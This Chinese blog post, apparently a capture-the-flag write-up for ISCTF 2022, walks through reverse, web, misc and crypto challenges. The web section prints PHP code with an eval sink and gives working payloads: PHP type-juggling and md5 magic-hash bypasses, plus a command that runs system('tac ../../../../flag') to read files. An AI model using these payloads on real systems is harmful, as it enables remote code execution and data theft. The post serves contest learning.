ISCTF

最新推荐文章于 2024-05-03 21:28:54 发布
最新推荐文章于 2024-05-03 21:28:54 发布
阅读量600 收藏
点赞数
文章标签: javascript html servlet
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhhhb1005/article/details/127672111
版权

re

SigninReverse

shift + f12/view - 查看查找字符串得到flag

base64

拖入IDA进入字符串,发现一串base64编码,并且有strcmp函数,盲猜变异的base加密CyberChef

直接解密即可

开摆re

exp,直接得到flag

v8 = 'isctfajzu'
Str2 = '123456789'
flag = []
for i in range(len(Str2)):
    flag.append( chr(ord(Str2[i]) ^ ord(v8[i])))

print("".join(flag))

web

EASY-PHP01

查看源码

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>web签到</title>
</head>
<body>
<!--给我一个hint,我给你一个hint-->
<!--?hint -->
 什么是GET?

随便传一个hint,得到一个新的网页

?php
include "./flag114514.php";
error_reporting(0);
if (isset($_GET['hint'])) {
    highlight_file(__FILE__);
    if (isset($_POST['ISCTF'])) {
        $ISCTF = $_POST['ISCTF'];
        if($ISCTF == 114514){
            if($ISCTF === "114514"){
                echo "好臭啊";
            }else{
                echo $flag;
            }
        }else{
            echo "= == === != !==";
        }
    }else{
        echo "什么是POST?";
    }
}else{
    echo " 什么是GET?";
}

分析源码,发现要post传参,payload:ISCTF=114514a

EASY-PHP02

 <?php
highlight_file(__FILE__);
error_reporting(0);
$flag = "flag{need_time_to_change}";
include_once("config.php");
$YOUR_NAME = $_GET["NAME"];
$GET1 = $_POST["GET1"];
$GET2 = $_POST["GET2"];
$POST1 = $_GET["P0ST1"];
$POST2 = $_GET["P0ST2"];
if (isset($YOUR_NAME)){
    echo $YOUR_NAME.",请开始你的答题。"."<br>";
}
else{
    echo "做题前请告诉我你是小蓝鲨吗?";
    exit();
}
if (is_numeric($POST1)){
    if ($_GET["P0ST1"] != $_GET["P0ST2"]){
        
        if (($_GET["P0ST1"]) == md5($_GET["P0ST2"])){

                $f1=$flag1;
                echo "小蓝鲨成功一半".$f1;              
            }
    }
}

if(preg_match('/^[0-9]*$/',$GET1)) {
exit();
}
else{
    if( $GET1 == 0 ){
        echo "<br>"."前面的出来了吗?";
        if(is_numeric($GET2)){
            exit();
        }
        if($GET2 > 678){
            echo "答案就在眼前?"."<br>".$YOUR_NAME.",你觉得这是flag吗?"."<br>";     
            $Ag=base64_encode($flag2);
            }
    }
}
$flag666 = $f1.$Ag;
echo $flag666;
?>
做题前请告诉我你是小蓝鲨吗?

is_numeric()判断是否为数字或者数字串

preg_match()正则匹配

所以payload

GET
?NAME=1&P0ST1=0e545993274517709034328855841020&P0ST2=s878926199a

POST
GET1=0e545993274517709034328855841020&GET2=679A

然后对得出来的flag分别进行base16和base64解密。

simplephp

<?php
highlight_file(__FILE__);
error_reporting(E_ERROR);



$str=$_GET['str'];
$pattern = "#\\\\\\\\/Ilikeisctf#";
function filter($num){
    $num=str_replace("0x","1",$num);
    $num=str_replace("0","1",$num);
    $num=str_replace(".","1",$num);
    $num=str_replace("e","1",$num);
    $num=str_replace("+","1",$num);
    return $num;
}

if(preg_match($pattern,$str,$arr))
{
    echo "good try!";
    $num=$_GET['num'];
    if(is_numeric($num) and $num!=='36' and trim($num)!=='36' and filter($num)=='36'){
        echo "come on!!!";
        if($num=='36'&isset($_GET['cmd'])){

                eval($_GET['cmd']);



        }else{
            echo "hacker!!";
        }
    }else{
        echo "hacker!!!";
    }




}

is_numeric()判断是否为数字或者数字串

preg_match()正则匹配

eval() 函数把字符串按照 PHP 代码来计算。

payload

?str=333\\\\\\\\/Ilikeisctf&num=%0c36&cmd=echo%20system(%27tac%20../../../../flag%27);

FakeWeb

根据题目:好快!你能看出来这是个假的页面吗?尝试抓包放包,拿到flag。

 misc

Welcome To ISCTF2022

签到即可

简单社工

谷歌识图,对比图片,发现图片的大致位置在台湾省高雄市,搜索高雄捷运。得到路线是红线,运行区间是小港到岗山,接着对比发车时间表,找到具体位置巨蛋站,将具体位置进行md5加密拿到flag。

KFC疯狂星期四

打开文件,没有密码提示,托到010查看二进制文件

504B03041400

504B01021400

,后四位全局加密位,发现被更改,伪加密更改标记位得到图片

发现其位置背裁剪,或者脚本CRC检验,得到原来的宽和高

得到另一个文件加密密码,看的不是很清楚,通道观察即可;

如下


输入密码得到flag 。

可爱的emoji

根据提示对文件进行爆破,发现是emoji编码,根据提示,掩码爆破得到密码为:KEYISAES

在线emoji-aes加密解密,密码AES解密,上面还高级旋转9,得到flag

捕风的魔女

题中给的图片发现不认识,谷歌识图发现是提瓦特文字和魔女解密,一个一个的对着写拿到了flag。 

CRYPTO

这是什么古典玩意

part1用到了base64和base32解密,part2使用hex转str和 unicode转码,part3是猪圈解密

拿到完整flag。

呜呜呜我的md5脏了

默认数字串,生成文件后crtl+f搜索与原md5对比即可。

import hashlib

s = '1234567890'
# ps = [i for i in range(len(s))]
with open('md6.txt', 'w') as f:
    print('正在写入。。。')
    for i in range(len(s)):
        for j in range(len(s)):
            for k in range(len(s)):
                for l in range(len(s)):
                    for r in range(len(s)):
                        for m in range(len(s)):
                            for n in range(len(s)):
                                md5 = hashlib.md5(('ISCTF{md5_is_11' + s[i] + s[j] + '1' + s[k] + s[l] + '8' + s[r] + s[m] + s[
                                    n]+'}').encode()).hexdigest() + '\n'
                                f.write(md5)
    print('写入完成。')
S@Kura
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
ISCTF2021-WriteUp.pdf
10-24
isctf的详细wp
GKCTF2021-官方WriteUp.pdf
07-06
GKCTF2021-官方WriteUp.pdf
2024年网络安全最新ISCTF2024新生赛-MISC_blueshark ctf
最新发布
2401_84264630的博客
05-03 508
回复消息可得flag。
ISCTF-WEB(部分)
BvxiE的博客
12-26 734
过太久了,可以网址都找不到了,凡事不能拖…有天晚上学习完上面的文章,我突然发现一道题出现了一些奇奇怪怪的东西!有趣!康康你能不能发现它?
ISCTF PWN WP 2022
GeekCmore的博客
11-07 1432
ISCTF PWN 部分题解 WP
ISCTF2023新生赛-MISC
miaoaixuan的博客
12-01 605
ISCTF2023新生赛-MISC
ISCTF 2022 REVERSE
chenglian1的博客
04-12 532
去年11月份左右为期一周的比赛,比较适合新手练习提高技能。比赛结束后有两道0解题,官方目前也没放出相应的wp。近期无意间翻到了这两道赛题中的一道就又拿来看了一眼,有一些新的思路和想法。
科普-CTF
菜鸟的博客
04-20 138
Web 网络攻防 Mobile移动安全 RE 逆向工程 PWN 二进制漏洞挖掘与利用
2024年网络安全山东省赛-SMB信息收集解析(中职组)_使用访问工具对服务器服务访问,将服务器中管理员桌面的文本文档里的内容作为 flag
2401_84252281的博客
04-26 628
任务环境说明:服务器场景:Server1。
2022 ISCTF《MD5脏了》
qq_45332357的博客
10-30 406
2022 ISCTF《MD5脏了》
ISCTF赛后总结
xiaf5的博客
10-24 2244
学了一个月的菜鸡,第一次打ctf比赛,感觉自己实在太菜了,总结总结经验。 Web 跟着队友混,队友Web贼强,Web全AK. CRYPTO 弯弯曲曲的路 不合格的pwn手竟然拿到密码题的一血。。。 题目描述:一只古典的蓝鲨从一条路的尽头上下上下上的走过了弯弯曲曲的小路上,并且经过了5棵树还有5个银行。 打开下载的文件,文件名为zip格式提示用zip格式打开解压缩。 根据题目描述,应该是5组,每组5个 分组后仔细观察,发现flag是交叉式的。 ISCTF{Welc0nne_..
ISCTF新生赛(引用传递&简单社工)
weixin_63231007的博客
11-28 788
而cat类中的 dog函数会对变量 $this->a 赋值字符串,我们可以利用这个$this->b = $this->c来给 $this->a 赋值 new mouse类,具体方法就是让$this->b = &$this->a,引用传递,之后die($this->a);根据 小港(南) 上北下南,肯定是红线,然后我们 去高雄捷运官网,根据唯一已知的末班车时刻表信息区查一下对应的站点。搜着搜着好多不是,但是最后猛地看见一个特别熟悉的背景,这不就是图里背面的画吗?我们搜索一下巨蛋站的信息,再确认一下。
【虚空】【ISCTF2023】ISCTF2023 Crypto方向全wp
qq_42557115的博客
12-02 1563
这篇为ISCTF2023 密码学方向的全wp,剩下的逆向和pwn慢慢更新吧…下边的论述争取让所有师傅都能看懂个七七八八(前提是跟着思路别看见数字就头疼)容易证明的定理下边就杂合到一起了,除了RSA的基础加解密下边没细说之外,剩下的所有公式只要没说不证,都在本篇中有涉及。
ISCTF 2022 WEB WP分享
starttv的博客
11-04 1655
可以执行代码,进入这里首要要满足,num通过is_numeric的检测,并且不等于36,去空后依然不等于36,经过过滤方法后依然等于36。在进行===比较时,php会先判断两种字符串的类型是否相同,很显然两者都是字符串,第一个判断通过,再进行值的比较,两者是不相等的。2、=== :强等于。php 的 0 与任何字符串比较都为 true,这是不对的,但其实是正确的,因为字符串被强制转换后都成了 0。在进行==比较时,php会自动将字符串转为数字进行值的比较,在这里114512和114512s是相等的。
ISCTF2023 web方向wp超详细解析+做题思路(部分)
2301_76690905的博客
11-29 3748
题目:提示了一句话密码为1,直接蚁剑连靶场,密码连1进去就能看见flag1根目录有flag2flag3不可能一个个点,肯定是转去虚拟终端用命令找,在开虚拟终端之前看下.sh,一般都会放些提示我们就能知道,FLAG3 包含了 FLAG 变量的从第 21 个字符到末尾的部分,可以直接在虚拟终端输出 FLAG3 变量的值那我们先进入虚拟终端,然后cd /去到根目录,然后在根目录输出FLAG3 变量的值别的命令不知道为什么不是返回不了,就是权限不够,都已经root了(?
ISCTF2022部分WP
y2xsec的博客
11-04 2318
ISCTF2022部分WP
ISCTF2022部分wp
m0_73952121的博客
11-07 917
ISCTF2022部分wp
2022-ISCTF-部分MISC和PWN
tbsqigongzi的博客
11-05 1265
ISCTF-部分wp
import gmpy2 import libnum from crypto.Util.number import * flag=b'ISCTF{*************}' m=bytes_to_long(flag)
11-24
flag = b'ISCTF{*************}' m = bytes_to_long(flag) # 使用gmpy2模块进行高精度计算 p = gmpy2.next_prime(m) q = gmpy2.next_prime(p) n = p * q # 使用libnum模块进行数字转换 e = libnum.invmod(65537, ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值